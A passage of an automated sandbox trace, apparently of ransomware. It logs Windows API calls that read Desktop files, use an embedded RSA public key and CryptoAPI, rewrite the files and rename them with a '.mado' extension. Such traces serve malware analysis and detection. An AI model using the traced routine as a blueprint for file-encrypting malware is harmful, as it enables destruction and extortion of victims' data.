hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.762] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x7b32, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.762] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0203.763] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.763] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.763] CloseHandle (hObject=0x63c) returned 1 [0203.764] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\atrloJQ04x.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\atrlojq04x.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\atrloJQ04x.mp3.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\atrlojq04x.mp3.mado")) returned 1 [0203.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.764] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326020 | out: hHeap=0x2c0000) returned 1 [0203.766] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a5a9970, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0x4eb38ee0, ftLastAccessTime.dwHighDateTime=0x1d5df91, ftLastWriteTime.dwLowDateTime=0x4eb38ee0, ftLastWriteTime.dwHighDateTime=0x1d5df91, nFileSizeHigh=0x0, nFileSizeLow=0xaa53, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BdD6 3od3oZknu3ORg1.swf", cAlternateFileName="BDD63O~1.SWF")) returned 1 [0203.766] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BdD6 3od3oZknu3ORg1.swf") returned=".swf" [0203.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BdD6 3od3oZknu3ORg1.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bdd6 3od3ozknu3org1.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.766] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=43603) returned 1 [0203.766] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.768] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xaa2d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.768] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.769] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xaa53, lpOverlapped=0x0) returned 1 [0203.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.770] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.770] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.771] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.771] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.771] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.771] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.771] GetLastError () returned 0x0 [0203.771] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.771] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.771] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.771] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.771] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.772] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x33109f0 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b795c0 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde00 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde18 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde48 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b795c0 | out: hHeap=0x2c0000) returned 1 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde48 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fde18 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fde00 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b682a8 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b683c0 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde18 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde00 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde48 | out: hHeap=0x2c0000) returned 1 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.773] GetCurrentThreadId () returned 0x600 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bb80 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3239d0 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bfa0 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.773] GetCurrentThreadId () returned 0x600 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6be98 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bd90 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde48 [0203.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde00 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde18 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdde8 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde60 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde30 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde78 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0203.774] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde00 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fde00 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde48 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b682a8 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde78 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x33109f0 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b68078 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68190 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde00 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3310c08 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6bc88 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6be98 | out: hHeap=0x2c0000) returned 1 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc88 | out: hHeap=0x2c0000) returned 1 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33109f0 | out: hHeap=0x2c0000) returned 1 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310c08 | out: hHeap=0x2c0000) returned 1 [0203.775] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde30 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde60 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fde18 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdde8 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bfa0 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fddd0 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6de08 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bd90 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3a48 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e51f8 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.776] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb68*, nNumberOfBytesToWrite=0xaa4e, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb68*, lpNumberOfBytesWritten=0x39cfb14*=0xaa4e, lpOverlapped=0x0) returned 1 [0203.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.777] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xaa53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.777] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6bb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6bb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0203.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0203.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3310808 [0203.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3310808, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0203.777] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b6eb68 [0203.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0203.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0203.777] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb68*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0203.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eb68 | out: hHeap=0x2c0000) returned 1 [0203.777] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.777] WriteFile 